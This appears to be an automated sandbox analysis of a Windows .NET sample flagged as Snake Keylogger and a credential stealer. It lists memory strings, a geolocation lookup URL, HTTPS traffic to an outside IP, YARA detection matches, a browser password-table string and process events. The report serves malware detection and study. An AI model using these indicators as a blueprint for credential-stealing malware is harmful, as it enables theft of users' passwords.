Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003C2F000.00000004.00000800.00020000.00000000.sdmp, 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003AA1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003C2F000.00000004.00000800.00020000.00000000.sdmp, 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003AA1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1510453566.0000000002B68000.00000004.00000800.00020000.00000000.sdmp, 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1510453566.0000000002AD2000.00000004.00000800.00020000.00000000.sdmp, 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1510453566.0000000002B41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1510453566.0000000002B41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1510453566.0000000002B68000.00000004.00000800.00020000.00000000.sdmp, 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1510453566.0000000002AFC000.00000004.00000800.00020000.00000000.sdmp, 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1510453566.0000000002B41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003C2F000.00000004.00000800.00020000.00000000.sdmp, 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003AA1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003C2F000.00000004.00000800.00020000.00000000.sdmp, 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003AA1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1510453566.0000000002C49000.00000004.00000800.00020000.00000000.sdmp, 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1510453566.0000000002C3A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1510453566.0000000002C3A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/XL
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1510453566.0000000002C44000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/lB
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49701
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49716 version: TLS 1.2

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, type: SAMPLE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, type: SAMPLE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, type: SAMPLE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.0.1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe.700000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.0.1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe.700000.0.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.0.1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe.700000.0.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000000.00000000.1233370033.0000000000702000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe PID: 6764, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Detected potential crypto function
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Code function: 0_2_00ECC146 0_2_00ECC146
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Code function: 0_2_00ECD278 0_2_00ECD278
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Code function: 0_2_00EC5362 0_2_00EC5362
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Code function: 0_2_00ECC468 0_2_00ECC468
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Code function: 0_2_00ECC738 0_2_00ECC738
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Code function: 0_2_00EC29E0 0_2_00EC29E0
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Code function: 0_2_00EC69A0 0_2_00EC69A0
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Code function: 0_2_00ECE988 0_2_00ECE988
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Code function: 0_2_00ECCA08 0_2_00ECCA08
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Code function: 0_2_00ECCCD8 0_2_00ECCCD8
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Code function: 0_2_00EC9DE0 0_2_00EC9DE0
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Code function: 0_2_00EC6FC8 0_2_00EC6FC8
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Code function: 0_2_00ECCFAA 0_2_00ECCFAA
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Code function: 0_2_00ECF62F 0_2_00ECF62F
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Code function: 0_2_00ECE97A 0_2_00ECE97A
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Code function: 0_2_00ECFA88 0_2_00ECFA88
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Code function: 0_2_00EC3E09 0_2_00EC3E09
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Code function: 0_2_06708688 0_2_06708688
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Code function: 0_2_06701288 0_2_06701288
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Code function: 0_2_06704168 0_2_06704168
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Code function: 0_2_06708D58 0_2_06708D58
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Code function: 0_2_06700BA8 0_2_06700BA8
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Code function: 0_2_06701970 0_2_06701970
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Code function: 0_2_0670E950 0_2_0670E950
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Code function: 0_2_0670F658 0_2_0670F658
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Code function: 0_2_0670F649 0_2_0670F649
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Code function: 0_2_0670C690 0_2_0670C690
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Code function: 0_2_0670C680 0_2_0670C680
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Code function: 0_2_0670D7F0 0_2_0670D7F0
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Code function: 0_2_0670D7EF 0_2_0670D7EF
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Code function: 0_2_0670E4F8 0_2_0670E4F8
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Code function: 0_2_0670E4E8 0_2_0670E4E8
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Code function: 0_2_0670127A 0_2_0670127A
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Code function: 0_2_0670C238 0_2_0670C238
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Code function: 0_2_0670F200 0_2_0670F200
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Code function: 0_2_0670D398 0_2_0670D398
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Code function: 0_2_0670D38A 0_2_0670D38A
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Code function: 0_2_06700040 0_2_06700040
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Code function: 0_2_0670E0A0 0_2_0670E0A0
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Code function: 0_2_0670E091 0_2_0670E091
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Code function: 0_2_06704159 0_2_06704159
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Code function: 0_2_0670F1F0 0_2_0670F1F0
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Code function: 0_2_0670CF40 0_2_0670CF40
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Code function: 0_2_0670CF31 0_2_0670CF31
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Code function: 0_2_0670CF3F 0_2_0670CF3F
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Code function: 0_2_0670DC48 0_2_0670DC48
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Code function: 0_2_0670DC38 0_2_0670DC38
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Code function: 0_2_06707CE0 0_2_06707CE0
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Code function: 0_2_0670BDE0 0_2_0670BDE0
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Code function: 0_2_0670BDCF 0_2_0670BDCF
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Code function: 0_2_0670EDA8 0_2_0670EDA8
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Code function: 0_2_0670ED99 0_2_0670ED99
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Code function: 0_2_0670CAE8 0_2_0670CAE8
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Code function: 0_2_0670CAD9 0_2_0670CAD9
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Code function: 0_2_0670FAB0 0_2_0670FAB0
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Code function: 0_2_0670FAA0 0_2_0670FAA0
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Code function: 0_2_06700B97 0_2_06700B97
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Code function: 0_2_06701962 0_2_06701962
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Code function: 0_2_0670E942 0_2_0670E942
One or more processes crash
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6764 -s 2620
Sample file is different than original file name gathered from version info
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000000.1233400753.0000000000746000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameRemington.exe4 vs 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1509663573.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Binary or memory string: OriginalFilenameRemington.exe4 vs 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe
Uses 32bit PE files
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, type: SAMPLE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, type: SAMPLE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, type: SAMPLE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.0.1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe.700000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.0.1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe.700000.0.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.0.1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe.700000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000000.00000000.1233370033.0000000000702000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe PID: 6764, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, -c.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, -c.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, --.cs Cryptographic APIs: 'TransformFinalBlock'
Source: classification engine Classification label: mal100.troj.spyw.winEXE@2/5@3/3
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Mutant created: NULL
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6764
Source: C:\Windows\SysWOW64\WerFault.exe File created: C:\ProgramData\Microsoft\Windows\WER\Temp\0c527140-ec93-4d74-952c-f67b035320fa Jump to behavior
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.79%
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1510453566.0000000002CA3000.00000004.00000800.00020000.00000000.sdmp, 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1510453566.0000000002CB2000.00000004.00000800.00020000.00000000.sdmp, 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1510453566.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp, 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1510453566.0000000002CE6000.00000004.00000800.00020000.00000000.sdmp, 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1510453566.0000000002CF3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe ReversingLabs: Detection: 65%
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe File read: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe "C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe"
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6764 -s 2620
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Section loaded: uxtheme.dll Jump to behavior
